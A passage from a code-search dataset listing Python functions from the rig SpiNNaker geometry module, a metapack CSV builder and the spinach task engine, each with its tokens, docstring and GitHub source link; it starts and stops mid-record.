"# Walk around the hexagon of this radius",
"for",
"dx",
",",
"dy",
"in",
"[",
"(",
"1",
",",
"1",
")",
",",
"(",
"0",
",",
"1",
")",
",",
"(",
"-",
"1",
",",
"0",
")",
",",
"(",
"-",
"1",
",",
"-",
"1",
")",
",",
"(",
"0",
",",
"-",
"1",
")",
",",
"(",
"1",
",",
"0",
")",
"]",
":",
"for",
"_",
"in",
"range",
"(",
"r",
")",
":",
"yield",
"(",
"x",
",",
"y",
")",
"x",
"+=",
"dx",
"y",
"+=",
"dy"
] | A generator which produces coordinates of concentric rings of hexagons.
Parameters
----------
radius : int
Number of layers to produce (0 is just one hexagon)
start : (x, y)
The coordinate of the central hexagon. | [
"A",
"generator",
"which",
"produces",
"coordinates",
"of",
"concentric",
"rings",
"of",
"hexagons",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L215-L235 |
project-rig/rig | rig/geometry.py | standard_system_dimensions | def standard_system_dimensions(num_boards):
"""Calculate the standard network dimensions (in chips) for a full torus
system with the specified number of SpiNN-5 boards.
Returns
-------
(w, h)
Width and height of the network in chips.
Standard SpiNNaker systems are constructed as squarely as possible
given the number of boards available. When a square system cannot be
made, the function prefers wider systems over taller systems.
Raises
------
ValueError
If the number of boards is not a multiple of three.
"""
# Special case to avoid division by 0
if num_boards == 0:
return (0, 0)
# Special case: meaningful systems with 1 board can exist
if num_boards == 1:
return (8, 8)
if num_boards % 3 != 0:
raise ValueError("{} is not a multiple of 3".format(num_boards))
# Find the largest pair of factors to discover the squarest system in terms
# of triads of boards.
for h in reversed( # pragma: no branch
range(1, int(sqrt(num_boards // 3)) + 1)):
if (num_boards // 3) % h == 0:
break
w = (num_boards // 3) // h
# Convert the number of triads into numbers of chips (each triad of boards
# contributes as 12x12 block of chips).
return (w * 12, h * 12) | python | def standard_system_dimensions(num_boards):
"""Calculate the standard network dimensions (in chips) for a full torus
system with the specified number of SpiNN-5 boards.
Returns
-------
(w, h)
Width and height of the network in chips.
Standard SpiNNaker systems are constructed as squarely as possible
given the number of boards available. When a square system cannot be
made, the function prefers wider systems over taller systems.
Raises
------
ValueError
If the number of boards is not a multiple of three.
"""
# Special case to avoid division by 0
if num_boards == 0:
return (0, 0)
# Special case: meaningful systems with 1 board can exist
if num_boards == 1:
return (8, 8)
if num_boards % 3 != 0:
raise ValueError("{} is not a multiple of 3".format(num_boards))
# Find the largest pair of factors to discover the squarest system in terms
# of triads of boards.
for h in reversed( # pragma: no branch
range(1, int(sqrt(num_boards // 3)) + 1)):
if (num_boards // 3) % h == 0:
break
w = (num_boards // 3) // h
# Convert the number of triads into numbers of chips (each triad of boards
# contributes as 12x12 block of chips).
return (w * 12, h * 12) | [
"def",
"standard_system_dimensions",
"(",
"num_boards",
")",
":",
"# Special case to avoid division by 0",
"if",
"num_boards",
"==",
"0",
":",
"return",
"(",
"0",
",",
"0",
")",
"# Special case: meaningful systems with 1 board can exist",
"if",
"num_boards",
"==",
"1",
":",
"return",
"(",
"8",
",",
"8",
")",
"if",
"num_boards",
"%",
"3",
"!=",
"0",
":",
"raise",
"ValueError",
"(",
"\"{} is not a multiple of 3\"",
".",
"format",
"(",
"num_boards",
")",
")",
"# Find the largest pair of factors to discover the squarest system in terms",
"# of triads of boards.",
"for",
"h",
"in",
"reversed",
"(",
"# pragma: no branch",
"range",
"(",
"1",
",",
"int",
"(",
"sqrt",
"(",
"num_boards",
"//",
"3",
")",
")",
"+",
"1",
")",
")",
":",
"if",
"(",
"num_boards",
"//",
"3",
")",
"%",
"h",
"==",
"0",
":",
"break",
"w",
"=",
"(",
"num_boards",
"//",
"3",
")",
"//",
"h",
"# Convert the number of triads into numbers of chips (each triad of boards",
"# contributes as 12x12 block of chips).",
"return",
"(",
"w",
"*",
"12",
",",
"h",
"*",
"12",
")"
] | Calculate the standard network dimensions (in chips) for a full torus
system with the specified number of SpiNN-5 boards.
Returns
-------
(w, h)
Width and height of the network in chips.
Standard SpiNNaker systems are constructed as squarely as possible
given the number of boards available. When a square system cannot be
made, the function prefers wider systems over taller systems.
Raises
------
ValueError
If the number of boards is not a multiple of three. | [
"Calculate",
"the",
"standard",
"network",
"dimensions",
"(",
"in",
"chips",
")",
"for",
"a",
"full",
"torus",
"system",
"with",
"the",
"specified",
"number",
"of",
"SpiNN",
"-",
"5",
"boards",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L238-L278 |
project-rig/rig | rig/geometry.py | spinn5_eth_coords | def spinn5_eth_coords(width, height, root_x=0, root_y=0):
"""Generate a list of board coordinates with Ethernet connectivity in a
SpiNNaker machine.
Specifically, generates the coordinates for the Ethernet connected chips of
SpiNN-5 boards arranged in a standard torus topology.
.. warning::
In general, applications should use
:py:class:`rig.machine_control.MachineController.get_system_info` and
:py:meth:`~rig.machine_control.machine_controller.SystemInfo.ethernet_connected_chips`
to gather the coordinates of Ethernet connected chips which are
actually functioning. For example::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(list(si.ethernet_connected_chips()))
[((0, 0), "1.2.3.4"), ((4, 8), "1.2.3.5"), ((8, 4), "1.2.3.6")]
Parameters
----------
width, height : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
# In oddly-shaped machines where chip (0, 0) does not exist, we must offset
# the coordinates returned in accordance with the root chip's location.
root_x %= 12
root_x %= 12
# Internally, work with the width and height rounded up to the next
# multiple of 12
w = ((width + 11) // 12) * 12
h = ((height + 11) // 12) * 12
for x in range(0, w, 12):
for y in range(0, h, 12):
for dx, dy in ((0, 0), (4, 8), (8, 4)):
nx = (x + dx + root_x) % w
ny = (y + dy + root_y) % h
# Skip points which are outside the range available
if nx < width and ny < height:
yield (nx, ny) | python | def spinn5_eth_coords(width, height, root_x=0, root_y=0):
"""Generate a list of board coordinates with Ethernet connectivity in a
SpiNNaker machine.
Specifically, generates the coordinates for the Ethernet connected chips of
SpiNN-5 boards arranged in a standard torus topology.
.. warning::
In general, applications should use
:py:class:`rig.machine_control.MachineController.get_system_info` and
:py:meth:`~rig.machine_control.machine_controller.SystemInfo.ethernet_connected_chips`
to gather the coordinates of Ethernet connected chips which are
actually functioning. For example::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(list(si.ethernet_connected_chips()))
[((0, 0), "1.2.3.4"), ((4, 8), "1.2.3.5"), ((8, 4), "1.2.3.6")]
Parameters
----------
width, height : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
# In oddly-shaped machines where chip (0, 0) does not exist, we must offset
# the coordinates returned in accordance with the root chip's location.
root_x %= 12
root_x %= 12
# Internally, work with the width and height rounded up to the next
# multiple of 12
w = ((width + 11) // 12) * 12
h = ((height + 11) // 12) * 12
for x in range(0, w, 12):
for y in range(0, h, 12):
for dx, dy in ((0, 0), (4, 8), (8, 4)):
nx = (x + dx + root_x) % w
ny = (y + dy + root_y) % h
# Skip points which are outside the range available
if nx < width and ny < height:
yield (nx, ny) | [
"def",
"spinn5_eth_coords",
"(",
"width",
",",
"height",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"# In oddly-shaped machines where chip (0, 0) does not exist, we must offset",
"# the coordinates returned in accordance with the root chip's location.",
"root_x",
"%=",
"12",
"root_x",
"%=",
"12",
"# Internally, work with the width and height rounded up to the next",
"# multiple of 12",
"w",
"=",
"(",
"(",
"width",
"+",
"11",
")",
"//",
"12",
")",
"*",
"12",
"h",
"=",
"(",
"(",
"height",
"+",
"11",
")",
"//",
"12",
")",
"*",
"12",
"for",
"x",
"in",
"range",
"(",
"0",
",",
"w",
",",
"12",
")",
":",
"for",
"y",
"in",
"range",
"(",
"0",
",",
"h",
",",
"12",
")",
":",
"for",
"dx",
",",
"dy",
"in",
"(",
"(",
"0",
",",
"0",
")",
",",
"(",
"4",
",",
"8",
")",
",",
"(",
"8",
",",
"4",
")",
")",
":",
"nx",
"=",
"(",
"x",
"+",
"dx",
"+",
"root_x",
")",
"%",
"w",
"ny",
"=",
"(",
"y",
"+",
"dy",
"+",
"root_y",
")",
"%",
"h",
"# Skip points which are outside the range available",
"if",
"nx",
"<",
"width",
"and",
"ny",
"<",
"height",
":",
"yield",
"(",
"nx",
",",
"ny",
")"
] | Generate a list of board coordinates with Ethernet connectivity in a
SpiNNaker machine.
Specifically, generates the coordinates for the Ethernet connected chips of
SpiNN-5 boards arranged in a standard torus topology.
.. warning::
In general, applications should use
:py:class:`rig.machine_control.MachineController.get_system_info` and
:py:meth:`~rig.machine_control.machine_controller.SystemInfo.ethernet_connected_chips`
to gather the coordinates of Ethernet connected chips which are
actually functioning. For example::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(list(si.ethernet_connected_chips()))
[((0, 0), "1.2.3.4"), ((4, 8), "1.2.3.5"), ((8, 4), "1.2.3.6")]
Parameters
----------
width, height : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`. | [
"Generate",
"a",
"list",
"of",
"board",
"coordinates",
"with",
"Ethernet",
"connectivity",
"in",
"a",
"SpiNNaker",
"machine",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L281-L328 |
project-rig/rig | rig/geometry.py | spinn5_local_eth_coord | def spinn5_local_eth_coord(x, y, w, h, root_x=0, root_y=0):
"""Get the coordinates of a chip's local ethernet connected chip.
Returns the coordinates of the ethernet connected chip on the same board as
the supplied chip.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
.. warning::
In general, applications should interrogate the machine to determine
which Ethernet connected chip is considered 'local' to a particular
SpiNNaker chip, e.g. using
:py:class:`rig.machine_control.MachineController.get_system_info`::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(si[(3, 2)].local_ethernet_chip)
(0, 0)
:py:func:`.spinn5_local_eth_coord` will always produce the coordinates
of the Ethernet-connected SpiNNaker chip on the same SpiNN-5 board as
the supplied chip. In future versions of the low-level system software,
some other method of choosing local Ethernet connected chips may be
used.
Parameters
----------
x, y : int
Chip whose coordinates are of interest.
w, h : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return ((x + int(dx)) % w), ((y + int(dy)) % h) | python | def spinn5_local_eth_coord(x, y, w, h, root_x=0, root_y=0):
"""Get the coordinates of a chip's local ethernet connected chip.
Returns the coordinates of the ethernet connected chip on the same board as
the supplied chip.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
.. warning::
In general, applications should interrogate the machine to determine
which Ethernet connected chip is considered 'local' to a particular
SpiNNaker chip, e.g. using
:py:class:`rig.machine_control.MachineController.get_system_info`::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(si[(3, 2)].local_ethernet_chip)
(0, 0)
:py:func:`.spinn5_local_eth_coord` will always produce the coordinates
of the Ethernet-connected SpiNNaker chip on the same SpiNN-5 board as
the supplied chip. In future versions of the low-level system software,
some other method of choosing local Ethernet connected chips may be
used.
Parameters
----------
x, y : int
Chip whose coordinates are of interest.
w, h : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return ((x + int(dx)) % w), ((y + int(dy)) % h) | [
"def",
"spinn5_local_eth_coord",
"(",
"x",
",",
"y",
",",
"w",
",",
"h",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"dx",
",",
"dy",
"=",
"SPINN5_ETH_OFFSET",
"[",
"(",
"y",
"-",
"root_y",
")",
"%",
"12",
"]",
"[",
"(",
"x",
"-",
"root_x",
")",
"%",
"12",
"]",
"return",
"(",
"(",
"x",
"+",
"int",
"(",
"dx",
")",
")",
"%",
"w",
")",
",",
"(",
"(",
"y",
"+",
"int",
"(",
"dy",
")",
")",
"%",
"h",
")"
] | Get the coordinates of a chip's local ethernet connected chip.
Returns the coordinates of the ethernet connected chip on the same board as
the supplied chip.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
.. warning::
In general, applications should interrogate the machine to determine
which Ethernet connected chip is considered 'local' to a particular
SpiNNaker chip, e.g. using
:py:class:`rig.machine_control.MachineController.get_system_info`::
>> from rig.machine_control import MachineController
>> mc = MachineController("my-machine")
>> si = mc.get_system_info()
>> print(si[(3, 2)].local_ethernet_chip)
(0, 0)
:py:func:`.spinn5_local_eth_coord` will always produce the coordinates
of the Ethernet-connected SpiNNaker chip on the same SpiNN-5 board as
the supplied chip. In future versions of the low-level system software,
some other method of choosing local Ethernet connected chips may be
used.
Parameters
----------
x, y : int
Chip whose coordinates are of interest.
w, h : int
Width and height of the system in chips.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`. | [
"Get",
"the",
"coordinates",
"of",
"a",
"chip",
"s",
"local",
"ethernet",
"connected",
"chip",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L331-L371 |
project-rig/rig | rig/geometry.py | spinn5_chip_coord | def spinn5_chip_coord(x, y, root_x=0, root_y=0):
"""Get the coordinates of a chip on its board.
Given the coordinates of a chip in a multi-board system, calculates the
coordinates of the chip within its board.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
Parameters
----------
x, y : int
The coordinates of the chip of interest
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return (-int(dx), -int(dy)) | python | def spinn5_chip_coord(x, y, root_x=0, root_y=0):
"""Get the coordinates of a chip on its board.
Given the coordinates of a chip in a multi-board system, calculates the
coordinates of the chip within its board.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
Parameters
----------
x, y : int
The coordinates of the chip of interest
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
"""
dx, dy = SPINN5_ETH_OFFSET[(y - root_y) % 12][(x - root_x) % 12]
return (-int(dx), -int(dy)) | [
"def",
"spinn5_chip_coord",
"(",
"x",
",",
"y",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"dx",
",",
"dy",
"=",
"SPINN5_ETH_OFFSET",
"[",
"(",
"y",
"-",
"root_y",
")",
"%",
"12",
"]",
"[",
"(",
"x",
"-",
"root_x",
")",
"%",
"12",
"]",
"return",
"(",
"-",
"int",
"(",
"dx",
")",
",",
"-",
"int",
"(",
"dy",
")",
")"
] | Get the coordinates of a chip on its board.
Given the coordinates of a chip in a multi-board system, calculates the
coordinates of the chip within its board.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
Parameters
----------
x, y : int
The coordinates of the chip of interest
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`. | [
"Get",
"the",
"coordinates",
"of",
"a",
"chip",
"on",
"its",
"board",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L405-L424 |
project-rig/rig | rig/geometry.py | spinn5_fpga_link | def spinn5_fpga_link(x, y, link, root_x=0, root_y=0):
"""Get the identity of the FPGA link which corresponds with the supplied
link.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
whose FPGAs are loaded with the SpI/O 'spinnaker_fpgas' image.
Parameters
----------
x, y : int
The chip whose link is of interest.
link : :py:class:`~rig.links.Link`
The link of interest.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
Returns
-------
(fpga_num, link_num) or None
If not None, the link supplied passes through an FPGA link. The
returned tuple indicates the FPGA responsible for the sending-side of
the link.
`fpga_num` is the number (0, 1 or 2) of the FPGA responsible for the
link.
`link_num` indicates which of the sixteen SpiNNaker links (0 to 15)
into an FPGA is being used. Links 0-7 are typically handled by S-ATA
link 0 and 8-15 are handled by S-ATA link 1.
Returns None if the supplied link does not pass through an FPGA.
"""
x, y = spinn5_chip_coord(x, y, root_x, root_y)
return SPINN5_FPGA_LINKS.get((x, y, link)) | python | def spinn5_fpga_link(x, y, link, root_x=0, root_y=0):
"""Get the identity of the FPGA link which corresponds with the supplied
link.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
whose FPGAs are loaded with the SpI/O 'spinnaker_fpgas' image.
Parameters
----------
x, y : int
The chip whose link is of interest.
link : :py:class:`~rig.links.Link`
The link of interest.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
Returns
-------
(fpga_num, link_num) or None
If not None, the link supplied passes through an FPGA link. The
returned tuple indicates the FPGA responsible for the sending-side of
the link.
`fpga_num` is the number (0, 1 or 2) of the FPGA responsible for the
link.
`link_num` indicates which of the sixteen SpiNNaker links (0 to 15)
into an FPGA is being used. Links 0-7 are typically handled by S-ATA
link 0 and 8-15 are handled by S-ATA link 1.
Returns None if the supplied link does not pass through an FPGA.
"""
x, y = spinn5_chip_coord(x, y, root_x, root_y)
return SPINN5_FPGA_LINKS.get((x, y, link)) | [
"def",
"spinn5_fpga_link",
"(",
"x",
",",
"y",
",",
"link",
",",
"root_x",
"=",
"0",
",",
"root_y",
"=",
"0",
")",
":",
"x",
",",
"y",
"=",
"spinn5_chip_coord",
"(",
"x",
",",
"y",
",",
"root_x",
",",
"root_y",
")",
"return",
"SPINN5_FPGA_LINKS",
".",
"get",
"(",
"(",
"x",
",",
"y",
",",
"link",
")",
")"
] | Get the identity of the FPGA link which corresponds with the supplied
link.
.. note::
This function assumes the system is constructed from SpiNN-5 boards
whose FPGAs are loaded with the SpI/O 'spinnaker_fpgas' image.
Parameters
----------
x, y : int
The chip whose link is of interest.
link : :py:class:`~rig.links.Link`
The link of interest.
root_x, root_y : int
The coordinates of the root chip (i.e. the chip used to boot the
machine), e.g. from
:py:attr:`rig.machine_control.MachineController.root_chip`.
Returns
-------
(fpga_num, link_num) or None
If not None, the link supplied passes through an FPGA link. The
returned tuple indicates the FPGA responsible for the sending-side of
the link.
`fpga_num` is the number (0, 1 or 2) of the FPGA responsible for the
link.
`link_num` indicates which of the sixteen SpiNNaker links (0 to 15)
into an FPGA is being used. Links 0-7 are typically handled by S-ATA
link 0 and 8-15 are handled by S-ATA link 1.
Returns None if the supplied link does not pass through an FPGA. | [
"Get",
"the",
"identity",
"of",
"the",
"FPGA",
"link",
"which",
"corresponds",
"with",
"the",
"supplied",
"link",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/geometry.py#L427-L463 |
Metatab/metapack | metapack/package/csv.py | CsvPackageBuilder._load_resource | def _load_resource(self, source_r, abs_path=False):
"""The CSV package has no reseources, so we just need to resolve the URLs to them. Usually, the
CSV package is built from a file system ackage on a publically acessible server. """
r = self.doc.resource(source_r.name)
r.url = self.resource_root.join(r.url).inner | python | def _load_resource(self, source_r, abs_path=False):
"""The CSV package has no reseources, so we just need to resolve the URLs to them. Usually, the
CSV package is built from a file system ackage on a publically acessible server. """
r = self.doc.resource(source_r.name)
r.url = self.resource_root.join(r.url).inner | [
"def",
"_load_resource",
"(",
"self",
",",
"source_r",
",",
"abs_path",
"=",
"False",
")",
":",
"r",
"=",
"self",
".",
"doc",
".",
"resource",
"(",
"source_r",
".",
"name",
")",
"r",
".",
"url",
"=",
"self",
".",
"resource_root",
".",
"join",
"(",
"r",
".",
"url",
")",
".",
"inner"
] | The CSV package has no reseources, so we just need to resolve the URLs to them. Usually, the
CSV package is built from a file system ackage on a publically acessible server. | [
"The",
"CSV",
"package",
"has",
"no",
"reseources",
"so",
"we",
"just",
"need",
"to",
"resolve",
"the",
"URLs",
"to",
"them",
".",
"Usually",
"the",
"CSV",
"package",
"is",
"built",
"from",
"a",
"file",
"system",
"ackage",
"on",
"a",
"publically",
"acessible",
"server",
"."
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/package/csv.py#L51-L57 |
NicolasLM/spinach | spinach/engine.py | Engine._reset | def _reset(self):
"""Initialization that must happen before the arbiter is (re)started"""
self._arbiter = None
self._workers = None
self._working_queue = None
self._must_stop = threading.Event() | python | def _reset(self):
"""Initialization that must happen before the arbiter is (re)started"""
self._arbiter = None
self._workers = None
self._working_queue = None
self._must_stop = threading.Event() | [
"def",
"_reset",
"(",
"self",
")",
":",
"self",
".",
"_arbiter",
"=",
"None",
"self",
".",
"_workers",
"=",
"None",
"self",
".",
"_working_queue",
"=",
"None",
"self",
".",
"_must_stop",
"=",
"threading",
".",
"Event",
"(",
")"
] | Initialization that must happen before the arbiter is (re)started | [
"Initialization",
"that",
"must",
"happen",
"before",
"the",
"arbiter",
"is",
"(",
"re",
")",
"started"
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L35-L40 |
NicolasLM/spinach | spinach/engine.py | Engine.attach_tasks | def attach_tasks(self, tasks: Tasks):
"""Attach a set of tasks.
A task cannot be scheduled or executed before it is attached to an
Engine.
>>> tasks = Tasks()
>>> spin.attach_tasks(tasks)
"""
if tasks._spin is not None and tasks._spin is not self:
logger.warning('Tasks already attached to a different Engine')
self._tasks.update(tasks)
tasks._spin = self | python | def attach_tasks(self, tasks: Tasks):
"""Attach a set of tasks.
A task cannot be scheduled or executed before it is attached to an
Engine.
>>> tasks = Tasks()
>>> spin.attach_tasks(tasks)
"""
if tasks._spin is not None and tasks._spin is not self:
logger.warning('Tasks already attached to a different Engine')
self._tasks.update(tasks)
tasks._spin = self | [
"def",
"attach_tasks",
"(",
"self",
",",
"tasks",
":",
"Tasks",
")",
":",
"if",
"tasks",
".",
"_spin",
"is",
"not",
"None",
"and",
"tasks",
".",
"_spin",
"is",
"not",
"self",
":",
"logger",
".",
"warning",
"(",
"'Tasks already attached to a different Engine'",
")",
"self",
".",
"_tasks",
".",
"update",
"(",
"tasks",
")",
"tasks",
".",
"_spin",
"=",
"self"
] | Attach a set of tasks.
A task cannot be scheduled or executed before it is attached to an
Engine.
>>> tasks = Tasks()
>>> spin.attach_tasks(tasks) | [
"Attach",
"a",
"set",
"of",
"tasks",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L47-L59 |
NicolasLM/spinach | spinach/engine.py | Engine.schedule_at | def schedule_at(self, task: Schedulable, at: datetime, *args, **kwargs):
"""Schedule a job to be executed in the future.
:arg task: the task or its name to execute in the background
:arg at: date at which the job should start. It is advised to pass a
timezone aware datetime to lift any ambiguity. However if a
timezone naive datetime if given, it will be assumed to
contain UTC time.
:arg args: args to be passed to the task function
:arg kwargs: kwargs to be passed to the task function
"""
task = self._tasks.get(task)
job = Job(task.name, task.queue, at, task.max_retries, task_args=args,
task_kwargs=kwargs)
return self._broker.enqueue_jobs([job]) | python | def schedule_at(self, task: Schedulable, at: datetime, *args, **kwargs):
"""Schedule a job to be executed in the future.
:arg task: the task or its name to execute in the background
:arg at: date at which the job should start. It is advised to pass a
timezone aware datetime to lift any ambiguity. However if a
timezone naive datetime if given, it will be assumed to
contain UTC time.
:arg args: args to be passed to the task function
:arg kwargs: kwargs to be passed to the task function
"""
task = self._tasks.get(task)
job = Job(task.name, task.queue, at, task.max_retries, task_args=args,
task_kwargs=kwargs)
return self._broker.enqueue_jobs([job]) | [
"def",
"schedule_at",
"(",
"self",
",",
"task",
":",
"Schedulable",
",",
"at",
":",
"datetime",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"task",
"=",
"self",
".",
"_tasks",
".",
"get",
"(",
"task",
")",
"job",
"=",
"Job",
"(",
"task",
".",
"name",
",",
"task",
".",
"queue",
",",
"at",
",",
"task",
".",
"max_retries",
",",
"task_args",
"=",
"args",
",",
"task_kwargs",
"=",
"kwargs",
")",
"return",
"self",
".",
"_broker",
".",
"enqueue_jobs",
"(",
"[",
"job",
"]",
")"
] | Schedule a job to be executed in the future.
:arg task: the task or its name to execute in the background
:arg at: date at which the job should start. It is advised to pass a
timezone aware datetime to lift any ambiguity. However if a
timezone naive datetime if given, it will be assumed to
contain UTC time.
:arg args: args to be passed to the task function
:arg kwargs: kwargs to be passed to the task function | [
"Schedule",
"a",
"job",
"to",
"be",
"executed",
"in",
"the",
"future",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L74-L88 |
NicolasLM/spinach | spinach/engine.py | Engine.schedule_batch | def schedule_batch(self, batch: Batch):
"""Schedule many jobs at once.
Scheduling jobs in batches allows to enqueue them fast by avoiding
round-trips to the broker.
:arg batch: :class:`Batch` instance containing jobs to schedule
"""
jobs = list()
for task, at, args, kwargs in batch.jobs_to_create:
task = self._tasks.get(task)
jobs.append(
Job(task.name, task.queue, at, task.max_retries,
task_args=args, task_kwargs=kwargs)
)
return self._broker.enqueue_jobs(jobs) | python | def schedule_batch(self, batch: Batch):
"""Schedule many jobs at once.
Scheduling jobs in batches allows to enqueue them fast by avoiding
round-trips to the broker.
:arg batch: :class:`Batch` instance containing jobs to schedule
"""
jobs = list()
for task, at, args, kwargs in batch.jobs_to_create:
task = self._tasks.get(task)
jobs.append(
Job(task.name, task.queue, at, task.max_retries,
task_args=args, task_kwargs=kwargs)
)
return self._broker.enqueue_jobs(jobs) | [
"def",
"schedule_batch",
"(",
"self",
",",
"batch",
":",
"Batch",
")",
":",
"jobs",
"=",
"list",
"(",
")",
"for",
"task",
",",
"at",
",",
"args",
",",
"kwargs",
"in",
"batch",
".",
"jobs_to_create",
":",
"task",
"=",
"self",
".",
"_tasks",
".",
"get",
"(",
"task",
")",
"jobs",
".",
"append",
"(",
"Job",
"(",
"task",
".",
"name",
",",
"task",
".",
"queue",
",",
"at",
",",
"task",
".",
"max_retries",
",",
"task_args",
"=",
"args",
",",
"task_kwargs",
"=",
"kwargs",
")",
")",
"return",
"self",
".",
"_broker",
".",
"enqueue_jobs",
"(",
"jobs",
")"
] | Schedule many jobs at once.
Scheduling jobs in batches allows to enqueue them fast by avoiding
round-trips to the broker.
:arg batch: :class:`Batch` instance containing jobs to schedule | [
"Schedule",
"many",
"jobs",
"at",
"once",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/engine.py#L90-L105 |
NicolasLM/spinach | spinach/engine.py | Engine.start_workers | def start_workers(self, number: int=DEFAULT_WORKER_NUMBER,
queue=DEFAULT_QUEUE, block=True,
stop_when_queue_empty=False):
"""Start the worker threads.
:arg number: number of worker threads to launch
:arg queue: name of the queue to consume, see :doc:`queues`
:arg block: whether to block the calling thread until a signal arrives
and workers get terminated
:arg stop_when_queue_empty: automatically stop the workers when the
queue is empty. Useful mostly for one-off scripts and testing.
"""
if self._arbiter or self._workers:
raise RuntimeError('Workers are already running')
self._working_queue = queue
tasks_names = '\n'.join(
[' - ' + task.name for task in self._tasks.tasks.values()
if task.queue == self._working_queue]
)
logger.info('Starting %d workers on queue "%s" with tasks:\n%s',
number, self._working_queue, tasks_names)
# Start the broker
self._broker.start()
# Start workers
self._workers = Workers(
num_workers=number,
namespace=self.namespace,
)
# Start the result notifier
self._result_notifier = threading.Thread(
target=run_forever,
args=(self._result_notifier_func, self._must_stop, logger),
name='{}-result-notifier'.format(self.namespace)
)
self._result_notifier.start()
# Start the arbiter
self._arbiter = threading.Thread(
target=run_forever,
args=(self._arbiter_func, self._must_stop, logger,
stop_when_queue_empty),
name='{}-arbiter'.format(self.namespace)
)
self._arbiter.start()
if block:
with handle_sigterm():
try:
self._arbiter.join()
except KeyboardInterrupt:
self.stop_workers()
except AttributeError:
# Arbiter thread starts and stops immediately when ran with
# `stop_when_queue_empty` and queue is already empty.
pass | python | def start_workers(self, number: int=DEFAULT_WORKER_NUMBER,
queue=DEFAULT_QUEUE, block=True,
stop_when_queue_empty=False):
"""Start the worker threads.
:arg number: number of worker threads to launch
:arg queue: name of the queue to consume, see :doc:`queues`
:arg block: whether to block the calling thread until a signal arrives
and workers get terminated
:arg stop_when_queue_empty: automatically stop the workers when the
queue is empty. Useful mostly for one-off scripts and testing.
"""
if self._arbiter or self._workers:
raise RuntimeError('Workers are already running')
self._working_queue = queue
tasks_names = '\n'.join(
[' - ' + task.name for task in self._tasks.tasks.values()
if task.queue == self._working_queue]
)
logger.info('Starting %d workers on queue "%s" with tasks:\n%s',
number, self._working_queue, tasks_names)
# Start the broker
self._broker.start()
# Start workers
self._workers = Workers(
num_workers=number,
namespace=self.namespace,
)
# Start the result notifier
self._result_notifier = threading.Thread(
target=run_forever,
args=(self._result_notifier_func, self._must_stop, logger),
name='{}-result-notifier'.format(self.namespace)
)
